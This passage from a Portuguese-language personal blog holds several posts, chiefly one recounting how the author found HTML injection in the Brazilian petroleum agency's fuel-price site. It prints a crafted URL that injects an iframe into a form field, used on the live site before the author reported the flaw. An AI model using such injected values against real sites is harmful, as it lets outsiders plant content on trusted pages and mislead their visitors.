Plataforma Lattes	SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)	TCU (Tribunal de Contas da União)

Jornais

Carta Maior	Estadão	Terra
Diário de São Paulo	O TEMPO	Rede Minas

Composição dos preços dos combustíveis: qual é a verdade?

Posted: May 3, 2011, 4:03pm MDT

Imagem via blog da Petrobras

Imagem via campanha para justificar os altos preços dos combustíveis

E aí, qual é a verdade?
Agência Nacional do Petróleo (ANP) e o mundo bugado

Posted: April 7, 2011, 7:33pm MDT

Após duas semanas revoltado com o alto preços dos combustíveis, decidi na madrugada do dia 05/04 fazer um post no twitter e identi.ca mostrando como foi abusivo o aumento do etanol (álcool) aqui em Brasília, que passou de R$ 2,02 para R$ 2,83.

Comentando com o Thiago Silva, ele falou que existia um sistema onde era possível visualizar os preços dos combustíveis em todo o Brasil. Acessamos o site da ANP e realmente o sistema possuía os preços atualizados por cidades e períodos. Observei que o formulário de pesquisa usava o método [HTTP%29"] title="">POST e não gerava uma URL amigável impossibilitando que eu mostrasse como estava caro os preços em Brasília. Como tenho conhecimento em HTML, comecei a ler o código do formulário para tentar gerar uma URL via método GET para conseguir publicar o link sobre o preço dos combustíveis em Brasília, para que outras pessoas acessassem diretamente a tabela de preços ao invés de preencher o formulário.

Acabei descobrindo que os campos "hidden", como por exemplo, o campo "selMunicipio" estava preenchido assim "1778*BRASILIA" e o campo "selSemana" estava "615*De 27/03/2011 a 02/04/2011". Percebendo isso, minha primeira reação foi tentar alterar o campo "selMunicipio" de "1778*BRASILIA" para "1778*A", e não é que apareceu escrito "A" ao invés de "BRASILIA", lá no site da ANP?! Mudei o "selMunicipio" para "1778*BRASILIA A CIDADE SEM LEI" e o "selSemana" para "615*De 27/03/2011 a 02/04/2011~INFINITO E ALEM" e publiquei a URL modificada aqui [1] e aqui [2].

Fiz mais um teste tentando colocar código HTML junto ao texto na URL e também funcionou. Ooooops ficou mais sério a falha de segurança.

Em paralelo aos testes, estava acontecendo muita conversa sobre os preços altos dos combustíveis e muita gente estava usando a hashtag combustivelmaisbaratoja.

Tive a ideia de fazer um abaixo-assinado e contribuir no assunto. Pensei em alguns métodos de como inserí-lo dentro da página da ANP, uma vez que eu consigo inserir código HTML na URL. Alguns minutos conversando com o Thiago, tive a ideia de usar um iframe. Comecei a desenvolver o formulário usando python-pesto, python-sqlalchemy e em alguns minutos depois estava pronto. Discutimos sobre onde hospedar e quais seriam as implicações. Decidimos hospedar o formulário no nosso próprio domínio mundobugado.org, numa forma de assumir, porque a nossa intenção era também demonstrar a falha no site e não só protestar.

Publiquei [1] e [2] a URL com o iframe e várias pessoas repassaram o link.

http://www.anp.gov.br/preco/prc/Resumo_Por_Municipio_Posto.asp?Tipo=2&cod_Semana=615&desc_Semana=A&selCombustivel=643*A&selMunicipio=1778*BRASILIA%20A%20CIDADE%20SEM%20LEI&selSemana=615*De%2027/03/2011%20a%2002/04/2011~INFINITO%20E%20ALEM%3Ciframe%20src=%2 [mundobugado.org]

imagem via yaso:

No dia seguinte, dia 06/04, a ANP retirou o Sistema de Pesquisa de Preços do ar. Procurei saber o motivo, se era por nossa causa, e era. No microblog tinha o seguinte alerta:

Um alerta mentiroso, uma vez que usamos a própria URL do site da ANP e não algo como "anp.com.br" ou "anp.net", etc. (Um dúvida minha, qual é a relação entre formulário falso e o sistema estar em manutenção?! Pura desculpa para uma falha deles?!). Algum tempo depois, vários sites replicaram o alerta [1], [2], [3], [4].

Olhei alguns códigos do site da ANP e encontrei outras brechas [1] e [2]. Agora, não só o Sistema de Pesquisa de Preços estava com a falha, mas a maior parte dos formulários do site, incluindo a busca principal. ANP, agora vocês vão retirar o site todo do ar? E vão usar o que como desculpa pela mal programação?!

Optei agora por não espalhar a URL com o iframe e avisei [1] e [2] a ANP sobre as falhas, mas até agora não recebi uma resposta.

O lado negativo de tudo isso, é que uma falha boba, de fácil solução, deixou o sistema 24h ~ ao infinito e além fora do ar. Me deixando com a pulga atrás da orelha, pensando que mesmo que a TI da ANP demore pra corrigir a falha, o lado político de deixar o sistema fora do ar nesse momento de grande procura dos dados. Uma pena...

Espero ter esclarecido o que aconteceu. Happy hack!

ATUALIZAÇÂO: 08/04/2011 18h20

O Sistema de Pesquisa de Preços esta no ar novamente e parece corrigido. Mas reparei que a busca do site sumiu, que foi o meu outro bug report. Será que a ANP vai fazer uma nota sobre o assunto?!

ATUALIZAÇÂO: 08/04/2011 20h52

A busca no site da ANP ainda não voltou =/ Mas sexta-feira, numa hora dessas, deve ficar o fim de semana todo sem a busca. Espero que corrijam todas as falhas do mesmo tipo que levantei sobre HTML Injection e não só os dois formulários bugados que citei nesse "artigo". Para isso, tenho mais um formulário bugado para testar, agora é esperar pra ver.

ATUALIZAÇÂO: 11/04/2011 22h18

Olhei de manhã, de tarde, mas agora a busca no site ANP está de volta e corrigida. Mas, e as outras falhas, quando serão corrigidas?!
JuntaDados e o Hall da vergonha

Posted: October 1, 2010, 5:58pm MDT

No dia 24/05/2010 eu li sobre a nova revisão da distribuição multimídia juntaDados 1.04r3. Achei interessante porque eu sabia que a Fabiana "Goa" e o Marcelo Souza estavam envolvidos, uma vez que trabalhei no minC e eles fazem parte de um dos Pontões de Cultura Digital. Lendo sobre a nova revisão do juntaDados reparei que não falava do código fonte, então comentei sobre isso na sala XMPP da MinasLivre. O Gustavo 'kov' Noronha entrou no fórum e fez um comentário perguntando sobre o código fonte. Ele recebeu uma resposta falando que era o mesmo código do Ubuntu e que se ele quisesse era só pegar os fontes nos mirrors do Ubuntu, porque eles não tinham infra-estrutura para manter o código fonte, que na minha opinião é uma desculpa boba, uma vez que eles podiam gerar um ISO com os fontes (a resposta publicada no dia foi editada e eu não tenho a original, mas tenho uma cópia de segurança do que esta publicado hoje).

No dia 21/06/2010 saiu a nova versão 2.04 e novamente eles não falaram sobre o código fonte. Dessa vez, eu fiz um comentário no fórum. O Thadeu 'GNU' Cascardo aproveitou o comentário que fiz e argumentou um pouco mais. Após esse comentário a conversa desandou totalmente (ainda bem que fiz essa cópia de segurança). O pessoal do juntaDados editou e apagou vários comentários e logo em seguida fecharam os comentários. Mas o pior, foi apagar todo o histórico da conversa algum tempo depois. E para piorar de vez, recebo um email de alguém do juntaDados com cópia para o kov e o cascardo. Aqui esta o primeiro email do juntaDados; A resposta do kov; Outro email do juntaDados; A minha resposta ao primeiro email do juntaDados; A minha resposta ao segundo email do juntaDados.

Depois de toda essa confusão eu decidi publicar toda a história para documentar o que aconteceu, mas de lá pra cá aconteceram mil coisas e eu acabei me enrolando. Mas antes tarde do que nunca.

Eu sempre me surpreendo quando vejo pessoas que trabalham com Software Livre que não sabem receber críticas. Não quero ser Polícia batendo na porta das pessoas, mas custa fazer direito?!
evolution+bogofilter

Posted: September 30, 2009, 10:34pm MDT

Estou a algumas semanas tentando fazer meu evolution filtrar emails "junk". Instalei o bogofilter, o spamassassin, habilitei os plugins no evolution e marquei todas as mensagens que eram junk (~300), torci pela primeira vez pra receber um spam , ele veio e não funcionou. Perguntei pro cascardo e também para ophractal se eles sabiam como habilitar. O phractal falou que no evolution dele funcionava perfeitamente. Verifiquei com ele e as configurações estavam iguais. Apaguei a minha wordlist (~/.bogofilter/wordlist.db) e marquei novamente os spams como "junk". Torci pela segunda vez pra receber um spam, ele veio e também não funcionou.

Hoje, lendo a blogada do Jack Wallen, descobri que eu estava treinando errado o meu filtro. É preciso marcar os emails que não são "junk" como "junk" e depois desmarcá-los. Fiz isso e torci pela terceira vez. O spam veio e foi direto pra minha pasta "junk", yeah!
metalstream

Posted: August 13, 2009, 8:57pm MDT
A um 1 atrás eu me formei (mas até hoje não busquei o diploma) e como projeto final, eu fiz um cliente Jabber/XMPP que armazena links de feeds XML (RSS ou Atom) no PubSub, tudo em JavaScript. Que no fundo é um cliente que agrega feeds XML a cada contato. Meu primeiro orientador achou que eu estava pirando muito e podou um tantão o que eu iria implementar. Em apenas dois dias eu fiz o cliente, usando como base um exemplo da jsjac. Fiz uma extensão da jsjac que chamei de pubsub.js e outra para recuperar as fotos dos usuários chamada vcard.js. Usei a jQuery pra fazer algumas coisas no cliente, mas como não pude pirar muito naquela época, tá tudo bem simples. Espero voltar a mexer nesse projeto logo.

Rodei um demo aqui: http://metalstream.alucinados.com/

E quem quiser mandar patch, eu uso git, é só rodar um:
```
git clone [git.alucinados.com] 
```
Alguns screenshots dele funcionando:

Login:
Cadastrando um Feed:

Lendo um Feed:
Jogo dos 7 erros

Posted: August 12, 2009, 7:28pm MDT

1) Teste de Memória do Windows:

2) CD de recuperação da HP com Windows:

3) Instalação do MacOSX:
lujorge.com.br

Posted: June 29, 2009, 8:07pm MDT

Alguns minutos antes de ir pro FISL 10, eu lancei a segunda versão do site lujorge.com.br. Esse site, eu fiz pra ajudar a divulgar o trabalho que o meu Tio Luiz Henrique, mais conhecido como Tí Lú, faz... A primeira versão foi uma experiência feita na tarde do Dias da Mães, onde exibia todos os trabalhos como thumbnails e uma foto grande. Não me preocupei com o tempo que levaria para carregar o site e nem se os thumbnails iriam ficar bonitos. Apenas joguei tudo lá pra mostrar pra minha família e pro meu Tio, e esse foi o resultado:

Já essa segunda versão, eu fiz usando: Django, jquery e o galleriffic. E como não sou um designer, ou melhor um hippie, aproveitei que o lincoln fez um menu legal pro EMSL 2009 e licenciou como GPL, pra usar no site. Esse é o resultado dessa segunda versão:

Agora é divulgar o trabalho pra tudo que é canto!

Sobre o meu Tio:

"Sou natural de Belo Horizonte/MG, onde resido atualmente. Tenho 35 anos, desenho desde os 5 anos de idade e me formei na Escola de Belas Artes da UFMG em 2000, me especializando em escultura e pintura. Hoje em dia faço trabalhos de decoração em festas e tenho produzido trabalhos para possíveis exposições."